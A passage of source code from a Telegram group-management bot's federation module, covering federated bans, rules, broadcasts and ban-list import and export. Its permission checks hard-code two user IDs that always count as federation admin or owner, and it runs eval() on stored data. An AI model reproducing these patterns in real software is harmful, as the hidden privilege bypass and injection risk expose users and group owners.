info['fname']))\n\t\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tLOGGER.warning(\"Cannot fban on {} because: {}\".format(chat, excp.message))\n\t\texcept TelegramError:\n\t\t\tpass\n\n\tsend_to_list(bot, FEDADMIN,\n\t\t\t \"New FedBan\" \\\n\t\t\t \"\\nFederation: {}\" \\\n\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t \"\\nUser: {}\" \\\n\t\t\t \"\\nUser ID: {}\" \\\n\t\t\t \"\\nReason: {}\".format(fed_name, mention_html(user.id, user.first_name),\n\t\t\t\t\t\t\t\t mention_html(user_chat.id, user_chat.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\tuser_chat.id, reason), \n\t\t\thtml=True)\n\tmessage.reply_text(\"This person has been fbanned\")\n\n\n@run_async\ndef unfban(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tmessage = update.effective_message # type: Optional[Message]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not a part of any federation!\")\n\t\treturn\n\n\tinfo = sql.get_fed_info(fed_id)\n\n\tif is_user_fed_admin(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only federation admins can do this!\")\n\t\treturn\n\n\tuser_id = extract_user(message, args)\n\tif not user_id:\n\t\tmessage.reply_text(\"You do not seem to be referring to a user.\")\n\t\treturn\n\n\tuser_chat = bot.get_chat(user_id)\n\tif user_chat.type != 'private':\n\t\tmessage.reply_text(\"That's not a user!\")\n\t\treturn\n\n\tfban, fbanreason = sql.get_fban_user(fed_id, user_id)\n\tif fban == False:\n\t\tmessage.reply_text(\"This user is not fbanned!\")\n\t\treturn\n\n\tbanner = update.effective_user # type: Optional[User]\n\n\tmessage.reply_text(\"I'll give {} a second chance in this federation\".format(user_chat.first_name))\n\n\tchat_list = sql.all_fed_chats(fed_id)\n\n\tfor chat in chat_list:\n\t\ttry:\n\t\t\tmember = bot.get_chat_member(chat, user_id)\n\t\t\tif member.status == 'kicked':\n\t\t\t\tbot.unban_chat_member(chat, user_id)\n\t\t\t\t\"\"\"\n\t\t\t\tbot.send_message(chat, \"Un-FedBan\" \\\n\t\t\t\t\t\t \"\\nFederation: {}\" \\\n\t\t\t\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t\t\t\t \"\\nUser: {}\" \\\n\t\t\t\t\t\t \"\\nUser ID: {}\".format(info['fname'], mention_html(user.id, user.first_name), mention_html(user_chat.id, user_chat.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\tuser_chat.id), parse_mode=\"HTML\")\n\t\t\t\t\"\"\"\n\n\t\texcept BadRequest as excp:\n\t\t\tif excp.message in UNFBAN_ERRORS:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\tLOGGER.warning(\"Cannot remove fban on {} because: {}\".format(chat, excp.message))\n\t\texcept TelegramError:\n\t\t\tpass\n\n\t\ttry:\n\t\t\tx = sql.un_fban_user(fed_id, user_id)\n\t\t\tif not x:\n\t\t\t\tmessage.reply_text(\"Fban failure, this user may have been un-fedbanned!\")\n\t\t\t\treturn\n\t\texcept:\n\t\t\tpass\n\n\tmessage.reply_text(\"This person is un-fbanned.\")\n\tFEDADMIN = sql.all_fed_users(fed_id)\n\"\"\"\n\tfor x in FEDADMIN:\n\t\tgetreport = sql.user_feds_report(x)\n\t\tif getreport == False:\n\t\t\tFEDADMIN.remove(x)\n\tsend_to_list(bot, FEDADMIN,\n\t\t\t \"Un-FedBan\" \\\n\t\t\t \"\\nFederation: {}\" \\\n\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t \"\\nUser: {}\" \\\n\t\t\t \"\\nUser ID: {}\".format(info['fname'], mention_html(user.id, user.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\t mention_html(user_chat.id, user_chat.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t user_chat.id),\n\t\t\thtml=True)\n\"\"\"\n\n@run_async\ndef set_frules(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This chat is not in any federation!\")\n\t\treturn\n\n\tif is_user_fed_admin(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only fed admins can do this!\")\n\t\treturn\n\n\tif len(args) >= 1:\n\t\tmsg = update.effective_message # type: Optional[Message]\n\t\traw_text = msg.text\n\t\targs = raw_text.split(None, 1) # use python's maxsplit to separate cmd and args\n\t\tif len(args) == 2:\n\t\t\ttxt = args[1]\n\t\t\toffset = len(txt) - len(raw_text) # set correct offset relative to command\n\t\t\tmarkdown_rules = markdown_parser(txt, entities=msg.parse_entities(), offset=offset)\n\t\tx = sql.set_frules(fed_id, markdown_rules)\n\t\tif not x:\n\t\t\tupdate.effective_message.reply_text(\"Big F! There is an error while setting federation rules! If you wondered why please ask it in @onepunchsupport !\")\n\t\t\treturn\n\n\t\trules = sql.get_fed_info(fed_id)['frules']\n\t\tupdate.effective_message.reply_text(f\"Rules have been changed to :\\n{rules}!\")\n\telse:\n\t\tupdate.effective_message.reply_text(\"Please write rules to set it up!\")\n\n\n@run_async\ndef get_frules(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tfed_id = sql.get_fed_id(chat.id)\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This chat is not in any federation!\")\n\t\treturn\n\n\trules = sql.get_frules(fed_id)\n\ttext = \"*Rules in this fed:*\\n\"\n\ttext += rules\n\tupdate.effective_message.reply_text(text, parse_mode=ParseMode.MARKDOWN)\n\n\n@run_async\ndef fed_broadcast(bot: Bot, update: Update, args: List[str]):\n\tmsg = update.effective_message # type: Optional[Message]\n\tuser = update.effective_user # type: Optional[User]\n\tif args:\n\t\tchat = update.effective_chat # type: Optional[Chat]\n\t\tfed_id = sql.get_fed_id(chat.id)\n\t\tfedinfo = sql.get_fed_info(fed_id)\n\t\ttext = \"*New broadcast from the Federation {}*\\n\".format(fedinfo['fname'])\n\t\t# Parsing md\n\t\traw_text = msg.text\n\t\targs = raw_text.split(None, 1) # use python's maxsplit to separate cmd and args\n\t\ttxt = args[1]\n\t\toffset = len(txt) - len(raw_text) # set correct offset relative to command\n\t\ttext_parser = markdown_parser(txt, entities=msg.parse_entities(), offset=offset)\n\t\ttext += text_parser\n\t\ttry:\n\t\t\tbroadcaster = user.first_name\n\t\texcept:\n\t\t\tbroadcaster = user.first_name + \" \" + user.last_name\n\t\ttext += \"\\n\\n- {}\".format(mention_markdown(user.id, broadcaster))\n\t\tchat_list = sql.all_fed_chats(fed_id)\n\t\tfailed = 0\n\t\tfor chat in chat_list:\n\t\t\ttry:\n\t\t\t\tbot.sendMessage(chat, text, parse_mode=\"markdown\")\n\t\t\texcept TelegramError:\n\t\t\t\tfailed += 1\n\t\t\t\tLOGGER.warning(\"Couldn't send broadcast to %s, group name %s\", str(chat.chat_id), str(chat.chat_name))\n\n\t\tsend_text = \"The federation broadcast is complete\"\n\t\tif failed >= 1:\n\t\t\tsend_text += \"{} the group failed to receive the message, probably because it left the Federation.\".format(failed)\n\t\tupdate.effective_message.reply_text(send_text)\n\n@run_async\ndef fed_ban_list(bot: Bot, update: Update, args: List[str], chat_data):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\n\tfed_id = sql.get_fed_id(chat.id)\n\tinfo = sql.get_fed_info(fed_id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not a part of any federation!\")\n\t\treturn\n\n\tif is_user_fed_owner(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only Federation owners can do this!\")\n\t\treturn\n\n\tuser = update.effective_user # type: Optional[Chat]\n\tchat = update.effective_chat # type: Optional[Chat]\n\tgetfban = sql.get_all_fban_users(fed_id)\n\tif len(getfban) == 0:\n\t\tupdate.effective_message.reply_text(\"The federation ban list of {} is empty\".format(info['fname']), parse_mode=ParseMode.HTML)\n\t\treturn\n\n\tif args:\n\t\tif args[0] == 'json':\n\t\t\tjam = time.time()\n\t\t\tnew_jam = jam + 1800\n\t\t\tcek = get_chat(chat.id, chat_data)\n\t\t\tif cek.get('status'):\n\t\t\t\tif jam <= int(cek.get('value')):\n\t\t\t\t\twaktu = time.strftime(\"%H:%M:%S %d/%m/%Y\", time.localtime(cek.get('value')))\n\t\t\t\t\tupdate.effective_message.reply_text(\"You can backup your data once every 30 minutes!\\nYou can back up data again at `{}`\".format(waktu), parse_mode=ParseMode.MARKDOWN)\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\t\telse:\n\t\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\t\tbackups = \"\"\n\t\t\tfor users in getfban:\n\t\t\t\tgetuserinfo = sql.get_all_fban_users_target(fed_id, users)\n\t\t\t\tjson_parser = {\"user_id\": users, \"first_name\": getuserinfo['first_name'], \"last_name\": getuserinfo['last_name'], \"user_name\": getuserinfo['user_name'], \"reason\": getuserinfo['reason']}\n\t\t\t\tbackups += json.dumps(json_parser)\n\t\t\t\tbackups += \"\\n\"\n\t\t\twith BytesIO(str.encode(backups)) as output:\n\t\t\t\toutput.name = \"saitama_fbanned_users.json\"\n\t\t\t\tupdate.effective_message.reply_document(document=output, filename=\"saitama_fbanned_users.json\",\n\t\t\t\t\t\t\t\t\t\t\t\t\tcaption=\"Total {} User are blocked by the Federation {}.\".format(len(getfban), info['fname']))\n\t\t\treturn\n\t\telif args[0] == 'csv':\n\t\t\tjam = time.time()\n\t\t\tnew_jam = jam + 1800\n\t\t\tcek = get_chat(chat.id, chat_data)\n\t\t\tif cek.get('status'):\n\t\t\t\tif jam <= int(cek.get('value')):\n\t\t\t\t\twaktu = time.strftime(\"%H:%M:%S %d/%m/%Y\", time.localtime(cek.get('value')))\n\t\t\t\t\tupdate.effective_message.reply_text(\"You can back up data once every 30 minutes!\\nYou can back up data again at `{}`\".format(waktu), parse_mode=ParseMode.MARKDOWN)\n\t\t\t\t\treturn\n\t\t\t\telse:\n\t\t\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\t\telse:\n\t\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\t\tbackups = \"id,firstname,lastname,username,reason\\n\"\n\t\t\tfor users in getfban:\n\t\t\t\tgetuserinfo = sql.get_all_fban_users_target(fed_id, users)\n\t\t\t\tbackups += \"{user_id},{first_name},{last_name},{user_name},{reason}\".format(user_id=users, first_name=getuserinfo['first_name'], last_name=getuserinfo['last_name'], user_name=getuserinfo['user_name'], reason=getuserinfo['reason'])\n\t\t\t\tbackups += \"\\n\"\n\t\t\twith BytesIO(str.encode(backups)) as output:\n\t\t\t\toutput.name = \"saitama_fbanned_users.csv\"\n\t\t\t\tupdate.effective_message.reply_document(document=output, filename=\"saitama_fbanned_users.csv\",\n\t\t\t\t\t\t\t\t\t\t\t\t\tcaption=\"Total {} User are blocked by Federation {}.\".format(len(getfban), info['fname']))\n\t\t\treturn\n\n\ttext = \"{} users have been banned from the federation {}:\\n\".format(len(getfban), info['fname'])\n\tfor users in getfban:\n\t\tgetuserinfo = sql.get_all_fban_users_target(fed_id, users)\n\t\tif getuserinfo == False:\n\t\t\ttext = \"There are no users banned from the federation {}\".format(info['fname'])\n\t\t\tbreak\n\t\tuser_name = getuserinfo['first_name']\n\t\tif getuserinfo['last_name']:\n\t\t\tuser_name += \" \" + getuserinfo['last_name']\n\t\ttext += \" • {} ({})\\n\".format(mention_html(users, user_name), users)\n\n\ttry:\n\t\tupdate.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\texcept:\n\t\tjam = time.time()\n\t\tnew_jam = jam + 1800\n\t\tcek = get_chat(chat.id, chat_data)\n\t\tif cek.get('status'):\n\t\t\tif jam <= int(cek.get('value')):\n\t\t\t\twaktu = time.strftime(\"%H:%M:%S %d/%m/%Y\", time.localtime(cek.get('value')))\n\t\t\t\tupdate.effective_message.reply_text(\"You can back up data once every 30 minutes!\\nYou can back up data again at `{}`\".format(waktu), parse_mode=ParseMode.MARKDOWN)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\telse:\n\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\tcleanr = re.compile('<.*?>')\n\t\tcleantext = re.sub(cleanr, '', text)\n\t\twith BytesIO(str.encode(cleantext)) as output:\n\t\t\toutput.name = \"fbanlist.txt\"\n\t\t\tupdate.effective_message.reply_document(document=output, filename=\"fbanlist.txt\",\n\t\t\t\t\t\t\t\t\t\t\t\t\tcaption=\"The following is a list of users who are currently fbanned in the Federation {}.\".format(info['fname']))\n\n@run_async\ndef fed_notif(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tmsg = update.effective_message # type: Optional[Message]\n\tfed_id = sql.get_fed_id(chat.id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not a part of any federation!\")\n\t\treturn\n\n\tif args:\n\t\tif args[0] in (\"yes\", \"on\"):\n\t\t\tsql.set_feds_setting(user.id, True)\n\t\t\tmsg.reply_text(\"Reporting Federation back up! Every user who is fban / unfban you will be notified via PM.\")\n\t\telif args[0] in (\"no\", \"off\"):\n\t\t\tsql.set_feds_setting(user.id, False)\n\t\t\tmsg.reply_text(\"Reporting Federation has stopped! Every user who is fban / unfban you will not be notified via PM.\")\n\t\telse:\n\t\t\tmsg.reply_text(\"Please enter `on`/`off`\", parse_mode=\"markdown\")\n\telse:\n\t\tgetreport = sql.user_feds_report(user.id)\n\t\tmsg.reply_text(\"Your current Federation report preferences: `{}`\".format(getreport), parse_mode=\"markdown\")\n\n@run_async\ndef fed_chats(bot: Bot, update: Update, args: List[str]):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tfed_id = sql.get_fed_id(chat.id)\n\tinfo = sql.get_fed_info(fed_id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not a part of any federation!\")\n\t\treturn\n\n\tif is_user_fed_admin(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only federation admins can do this!\")\n\t\treturn\n\n\tgetlist = sql.all_fed_chats(fed_id)\n\tif len(getlist) == 0:\n\t\tupdate.effective_message.reply_text(\"No users are fbanned from the federation {}\".format(info['fname']), parse_mode=ParseMode.HTML)\n\t\treturn\n\n\ttext = \"New chat joined the federation {}:\\n\".format(info['fname'])\n\tfor chats in getlist:\n\t\tchat_name = sql.get_fed_name(chats)\n\t\ttext += \" • {} ({})\\n\".format(chat_name, chats)\n\n\ttry:\n\t\tupdate.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\texcept:\n\t\tcleanr = re.compile('<.*?>')\n\t\tcleantext = re.sub(cleanr, '', text)\n\t\twith BytesIO(str.encode(cleantext)) as output:\n\t\t\toutput.name = \"fbanlist.txt\"\n\t\t\tupdate.effective_message.reply_document(document=output, filename=\"fbanlist.txt\",\n\t\t\t\t\t\t\t\t\t\t\t\t\tcaption=\"Here is a list of all the chats that joined the federation {}.\".format(info['fname']))\n\n@run_async\ndef fed_import_bans(bot: Bot, update: Update, chat_data):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\tmsg = update.effective_message # type: Optional[Message]\n\n\tfed_id = sql.get_fed_id(chat.id)\n\tinfo = sql.get_fed_info(fed_id)\n\n\tif not fed_id:\n\t\tupdate.effective_message.reply_text(\"This group is not a part of any federation!\")\n\t\treturn\n\n\tif is_user_fed_owner(fed_id, user.id) == False:\n\t\tupdate.effective_message.reply_text(\"Only Federation owners can do this!\")\n\t\treturn\n\n\tif msg.reply_to_message and msg.reply_to_message.document:\n\t\tjam = time.time()\n\t\tnew_jam = jam + 1800\n\t\tcek = get_chat(chat.id, chat_data)\n\t\tif cek.get('status'):\n\t\t\tif jam <= int(cek.get('value')):\n\t\t\t\twaktu = time.strftime(\"%H:%M:%S %d/%m/%Y\", time.localtime(cek.get('value')))\n\t\t\t\tupdate.effective_message.reply_text(\"You can backup you rdata once every 30 minutes!\\nYou can backup data again at `{}`\".format(waktu), parse_mode=ParseMode.MARKDOWN)\n\t\t\t\treturn\n\t\t\telse:\n\t\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\telse:\n\t\t\tif user.id not in SUDO_USERS:\n\t\t\t\tput_chat(chat.id, new_jam, chat_data)\n\t\tif int(int(msg.reply_to_message.document.file_size)/1024) >= 200:\n\t\t\tmsg.reply_text(\"This file is too big!\")\n\t\t\treturn\n\t\tsuccess = 0\n\t\tfailed = 0\n\t\ttry:\n\t\t\tfile_info = bot.get_file(msg.reply_to_message.document.file_id)\n\t\texcept BadRequest:\n\t\t\tmsg.reply_text(\"Try downloading and re-uploading the file, this one seems broken!\")\n\t\t\treturn\n\t\tfileformat = msg.reply_to_message.document.file_name.split('.')[-1]\n\t\tif fileformat == 'json':\n\t\t\twith BytesIO() as file:\n\t\t\t\tfile_info.download(out=file)\n\t\t\t\tfile.seek(0)\n\t\t\t\treading = file.read().decode('UTF-8')\n\t\t\t\tsplitting = reading.split('\\n')\n\t\t\t\tfor x in splitting:\n\t\t\t\t\tif x == '':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\ttry:\n\t\t\t\t\t\tdata = json.loads(x)\n\t\t\t\t\texcept json.decoder.JSONDecodeError as err:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\ttry:\n\t\t\t\t\t\timport_userid = int(data['user_id']) # Make sure it int\n\t\t\t\t\t\timport_firstname = str(data['first_name'])\n\t\t\t\t\t\timport_lastname = str(data['last_name'])\n\t\t\t\t\t\timport_username = str(data['user_name'])\n\t\t\t\t\t\timport_reason = str(data['reason'])\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t# Checking user\n\t\t\t\t\tif int(import_userid) == bot.id:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif is_user_fed_owner(fed_id, import_userid) == True:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif is_user_fed_admin(fed_id, import_userid) == True:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif str(import_userid) == str(OWNER_ID):\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif int(import_userid) in SUDO_USERS:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif int(import_userid) in WHITELIST_USERS:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\taddtodb = sql.fban_user(fed_id, str(import_userid), import_firstname, import_lastname, import_username, import_reason)\n\t\t\t\t\tif addtodb:\n\t\t\t\t\t\tsuccess += 1\n\t\t\ttext = \"Successfully imported! {} people are fbanned.\".format(success)\n\t\t\tif failed >= 1:\n\t\t\t\ttext += \" {} Failed to import.\".format(failed)\n\t\telif fileformat == 'csv':\n\t\t\twith BytesIO() as file:\n\t\t\t\tfile_info.download(out=file)\n\t\t\t\tfile.seek(0)\n\t\t\t\treading = file.read().decode('UTF-8')\n\t\t\t\tsplitting = reading.split('\\n')\n\t\t\t\tfor x in splitting:\n\t\t\t\t\tif x == '':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tdata = x.split(',')\n\t\t\t\t\tif data[0] == 'id':\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif len(data) != 5:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\ttry:\n\t\t\t\t\t\timport_userid = int(data[0]) # Make sure it int\n\t\t\t\t\t\timport_firstname = str(data[1])\n\t\t\t\t\t\timport_lastname = str(data[2])\n\t\t\t\t\t\timport_username = str(data[3])\n\t\t\t\t\t\timport_reason = str(data[4])\n\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\t# Checking user\n\t\t\t\t\tif int(import_userid) == bot.id:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif is_user_fed_owner(fed_id, import_userid) == True:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif is_user_fed_admin(fed_id, import_userid) == True:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif str(import_userid) == str(OWNER_ID):\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif int(import_userid) in SUDO_USERS:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif int(import_userid) in WHITELIST_USERS:\n\t\t\t\t\t\tfailed += 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\taddtodb = sql.fban_user(fed_id, str(import_userid), import_firstname, import_lastname, import_username, import_reason)\n\t\t\t\t\tif addtodb:\n\t\t\t\t\t\tsuccess += 1\n\t\t\ttext = \"Successfully imported. {} people are fbanned.\".format(success)\n\t\t\tif failed >= 1:\n\t\t\t\ttext += \" {} failed to import.\".format(failed)\n\t\telse:\n\t\t\tupdate.effective_message.reply_text(\"File not supported\")\n\t\t\treturn\n\t\tupdate.effective_message.reply_text(text)\n\n@run_async\ndef del_fed_button(bot, update):\n\tquery = update.callback_query\n\tuserid = query.message.chat.id\n\tfed_id = query.data.split(\"_\")[1]\n\n\tif fed_id == 'cancel':\n\t\tquery.message.edit_text(\"Federation deletion cancelled\")\n\t\treturn\n\n\tgetfed = sql.get_fed_info(fed_id)\n\tif getfed:\n\t\tdelete = sql.del_fed(fed_id)\n\t\tif delete:\n\t\t\tquery.message.edit_text(\"You have removed your Federation! Now all the Groups that are connected with `{}` do not have a Federation.\".format(getfed['fname']), parse_mode='markdown')\n\n\ndef is_user_fed_admin(fed_id, user_id):\n\tfed_admins = sql.all_fed_users(fed_id)\n\tif int(user_id) == int(654839744):\n\t\treturn True\n\tif fed_admins == False:\n\t\treturn False\n\tif int(user_id) in fed_admins:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef is_user_fed_owner(fed_id, user_id):\n\tgetsql = sql.get_fed_info(fed_id)\n\tif getsql == False:\n\t\treturn False\n\tgetfedowner = eval(getsql['fusers'])\n\tif getfedowner == None or getfedowner == False:\n\t\treturn False\n\tgetfedowner = getfedowner['owner']\n\tif str(user_id) == getfedowner or user_id == 388576209:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\n@run_async\ndef welcome_fed(bot, update):\n\tchat = update.effective_chat # type: Optional[Chat]\n\tuser = update.effective_user # type: Optional[User]\n\n\tfed_id = sql.get_fed_id(chat.id)\n\tfban, fbanreason = sql.get_fban_user(fed_id, user.id)\n\tif fban:\n\t\tupdate.effective_message.reply_text(\"This user is banned in current federation! I will remove him.\")\n\t\tbot.kick_chat_member(chat.id, user.id)\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef __stats__():\n\tall_fbanned = sql.get_all_fban_users_global()\n\tall_feds = sql.get_all_feds_users_global()\n\treturn \"{} fbanned users, accross {} feds\".format(len(all_fbanned), len(all_feds))\n\n\ndef __user_info__(user_id, chat_id):\n\tfed_id = sql.get_fed_id(chat_id)\n\tif fed_id:\n\t\tfban, fbanreason = sql.get_fban_user(fed_id, user_id)\n\t\tinfo = sql.get_fed_info(fed_id)\n\t\tinfoname = info['fname']\n\n\t\tif int(info['owner']) == user_id:\n\t\t\ttext = \"This user is the owner of the current Federation: {}.\".format(infoname)\n\t\telif is_user_fed_admin(fed_id, user_id):\n\t\t\ttext = \"This user is the admin of the current Federation: {}.\".format(infoname)\n\n\t\telif fban:\n\t\t\ttext = \"Banned in the current Federation: Yes\"\n\t\t\ttext += \"\\nReason: {}\".format(fbanreason)\n\t\telse:\n\t\t\ttext = \"Banned in the current Federation: No\"\n\telse:\n\t\ttext = \"\"\n\treturn text\n\n\n# Temporary data\ndef put_chat(chat_id, value, chat_data):\n\t# print(chat_data)\n\tif value == False:\n\t\tstatus = False\n\telse:\n\t\tstatus = True\n\tchat_data[chat_id] = {'federation': {\"status\": status, \"value\": value}}\n\ndef get_chat(chat_id, chat_data):\n\t# print(chat_data)\n\ttry:\n\t\tvalue = chat_data[chat_id]['federation']\n\t\treturn value\n\texcept KeyError:\n\t\treturn {\"status\": False, \"value\": False}\n\n\n__mod_name__ = \"Federation\"\n\n__help__ = \"\"\"\nAh, group management. Everything is fun, until the spammer starts entering your group, and you have to block it. Then you need to start banning more, and more, and it hurts.\nBut then you have many groups, and you don't want this spammer to be in one of your groups - how can you deal? Do you have to manually block it, in all your groups?\n\nNo longer! With Federation, you can make a ban in one chat overlap with all other chats.\nYou can even designate admin federations, so your trusted admin can ban all the chats you want to protect.\n\nStill the experimental stage, to make Federation can only be done by my maker\n\nCommand:\n - /newfed : create a new Federation with the name given. Users are only allowed to have one Federation. This method can also be used to rename the Federation. (max. 64 characters)\n - /delfed: delete your Federation, and any information related to it. Will not cancel blocked users.\n - /fedinfo : information about the specified Federation.\n - /joinfed : join the current chat to the Federation. Only chat owners can do this. Every chat can only be in one Federation.\n - /leavefed : leave the Federation given. Only chat owners can do this.\n - /fpromote : promote Users to give fed admin. Fed owner only.\n - /fdemote : drops the User from the admin Federation to a normal User. Fed owner only.\n - /fban : ban users from all federations where this chat takes place, and executors have control over.\n - /unfban : cancel User from all federations where this chat takes place, and that the executor has control over.\n - /setfrules: Arrange Federation rules.\n - /frules: See Federation regulations.\n - /chatfed: See the Federation in the current chat.\n - /fedadmins: Show Federation admin.\n - /fbanlist: Displays all users who are victimized at the Federation at this time.\n - /fedchats: Get all the chats that are connected in the Federation.\n - /importfbans: Reply to the Federation backup message file to import the banned list to the Federation now.\n\"\"\"\n\nNEW_FED_HANDLER = CommandHandler(\"newfed\", new_fed)\nDEL_FED_HANDLER = CommandHandler(\"delfed\", del_fed, pass_args=True)\nJOIN_FED_HANDLER = CommandHandler(\"joinfed\", join_fed, pass_args=True)\nLEAVE_FED_HANDLER = CommandHandler(\"leavefed\", leave_fed, pass_args=True)\nPROMOTE_FED_HANDLER = CommandHandler(\"fpromote\", user_join_fed, pass_args=True)\nDEMOTE_FED_HANDLER = CommandHandler(\"fdemote\", user_demote_fed, pass_args=True)\nINFO_FED_HANDLER = CommandHandler(\"fedinfo\", fed_info, pass_args=True)\nBAN_FED_HANDLER = DisableAbleCommandHandler([\"fban\", \"fedban\"], fed_ban, pass_args=True)\nUN_BAN_FED_HANDLER = CommandHandler(\"unfban\", unfban, pass_args=True)\nFED_BROADCAST_HANDLER = CommandHandler(\"fbroadcast\", fed_broadcast, pass_args=True)\nFED_SET_RULES_HANDLER = CommandHandler(\"setfrules\", set_frules, pass_args=True)\nFED_GET_RULES_HANDLER = CommandHandler(\"frules\", get_frules, pass_args=True)\nFED_CHAT_HANDLER = CommandHandler(\"chatfed\", fed_chat, pass_args=True)\nFED_ADMIN_HANDLER = CommandHandler(\"fedadmins\", fed_admin, pass_args=True)\nFED_USERBAN_HANDLER = CommandHandler(\"fbanlist\", fed_ban_list, pass_args=True, pass_chat_data=True)\nFED_NOTIF_HANDLER = CommandHandler(\"fednotif\", fed_notif, pass_args=True)\nFED_CHATLIST_HANDLER = CommandHandler(\"fedchats\", fed_chats, pass_args=True)\nFED_IMPORTBAN_HANDLER = CommandHandler(\"importfbans\", fed_import_bans, pass_chat_data=True)\n\nDELETEBTN_FED_HANDLER = CallbackQueryHandler(del_fed_button, pattern=r\"rmfed_\")\n\ndispatcher.add_handler(NEW_FED_HANDLER)\ndispatcher.add_handler(DEL_FED_HANDLER)\ndispatcher.add_handler(JOIN_FED_HANDLER)\ndispatcher.add_handler(LEAVE_FED_HANDLER)\ndispatcher.add_handler(PROMOTE_FED_HANDLER)\ndispatcher.add_handler(DEMOTE_FED_HANDLER)\ndispatcher.add_handler(INFO_FED_HANDLER)\ndispatcher.add_handler(BAN_FED_HANDLER)\ndispatcher.add_handler(UN_BAN_FED_HANDLER)\ndispatcher.add_handler(FED_BROADCAST_HANDLER)\ndispatcher.add_handler(FED_SET_RULES_HANDLER)\ndispatcher.add_handler(FED_GET_RULES_HANDLER)\ndispatcher.add_handler(FED_CHAT_HANDLER)\ndispatcher.add_handler(FED_ADMIN_HANDLER)\ndispatcher.add_handler(FED_USERBAN_HANDLER)\n# dispatcher.add_handler(FED_NOTIF_HANDLER)\ndispatcher.add_handler(FED_CHATLIST_HANDLER)\ndispatcher.add_handler(FED_IMPORTBAN_HANDLER)\n\ndispatcher.add_handler(DELETEBTN_FED_HANDLER)\n","repo_name":"xditya/GroupManager","sub_path":"haruka/modules/feds.py","file_name":"feds.py","file_ext":"py","file_size_in_byte":43331,"program_lang":"python","lang":"en","doc_type":"code","stars":260,"dataset":"github-code","pt":"42"} 